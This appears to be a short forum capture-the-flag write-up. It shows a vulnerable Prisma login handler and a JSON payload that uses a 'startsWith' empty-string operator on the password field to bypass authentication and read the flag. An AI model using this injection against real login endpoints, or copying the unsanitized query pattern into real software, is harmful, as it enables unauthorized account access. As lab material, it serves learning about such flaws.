Yea this one was a lil harder, cba to read documentation...
findUnique allows to pass filter objects on non unique fields. Soo i basically just run a contains empty string query onto the password or a startsWith empty string and bypass the login auth.
POST /login
with
View attachment Screenshot 2026-02-19 001424.png
JavaScript:
const u = await prisma.user.findUnique({
where: {
username: c.username,
password: c.password,
},
});
if (!u) {
return new Response('UNAUTHORIZED', { status: 401 });
}
if (u.role === 'User') {
return new Response('NO FLAG', { status: 204 });
}
return new Response('Flag is ' + (process.env.FLAG || 'NNS{fake-flag}'));findUnique allows to pass filter objects on non unique fields. Soo i basically just run a contains empty string query onto the password or a startsWith empty string and bypass the login auth.
POST /login
with
JSON:
{
"username": "admin",
"password": { "startsWith": "" }
}View attachment Screenshot 2026-02-19 001424.png
